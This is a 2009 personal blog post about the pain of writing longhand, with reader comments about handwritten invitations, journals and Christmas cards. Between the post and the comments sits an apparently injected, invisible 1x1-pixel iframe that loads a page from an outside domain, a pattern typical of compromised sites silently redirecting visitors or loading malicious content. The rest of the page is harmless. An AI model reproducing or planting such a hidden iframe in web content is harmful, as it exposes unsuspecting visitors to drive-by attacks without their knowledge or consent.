Posted by: wrmcnutt | April 16, 2009

Longhand, Cursive, Printing, and Hand Cramps


Well, that hurt. I actually had to write in longhand today for the first time in a very long time. And it hurt. A lot. My Dad is renting out two properties, a house and an apartment. I had been meaning to get over to the University Student Center and post flyers for them on the Rental Board, and I hadn’t gotten around to making up flyers.

I had to run over there for another reason, and spotted some you-fill-out forms for rental properties, and thought, “Well, it would be as persuasive as something with pictures and flavor text, but it’ll be better than nothing.” So I grabbed a couple of forms and started filling them out.

Ow. Owowowowow.

My fingers cramped, and I got a knot in the base of my thumb that’s still there.

After giving it some thought, I couldn’t remember when the last time I wrote anything significan out in longhand.

How about you?

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Responses

  1. I know exactly the last time I had to write something out longhand. Tuesday night, filling out 24 invitations to a bachelorette party I’m hosting. Because, even in the 21st century, there are those that do not have email. So instead of doing an e-vite or something similar, I spent 2+ hours filling out invitations and addressing them. At least I had a stamp for the return address. Too bad I also had to stick stamps on them (and ended up at the post office on one of the worst days of the year).

    • I think there’s only one person left on my list who is determinedly disconnected. Some are intermittent, but there’s only one who’s off the grid.

  2. I write my journal sometimes, especially if I’m on vacation. Because vacation is all about being away from a computer. But it’s a relief from the ‘click finger’ I’m developing in my right forefinger.

  3. Christmas cards. Even if the addresses get put on as a label, I still always try to do a short note inside to each individual. Of course the Christmas letters didn’t go out till mid February this year. Maybe next year I’ll just plan to do them in February and it will be a valentines letter.

  4. I’m planning to scan in some of my wife’s longhand and make a font out of it. Then we can address cards that look handwritten.

  5. hand writing does cause a cramp…………get a massage, with that twisty finger move you like and it will help……….I think that is a batch of muscles that have atrophied with time and technology!

    • I just realized – you remember that twisty finger move it like. It’s been quite a while. I’m not sure if I should be flattered that you remember me, or embarassed that I was so picky when you were trying to relieve the knots in my hand.


Leave a Reply

Categories

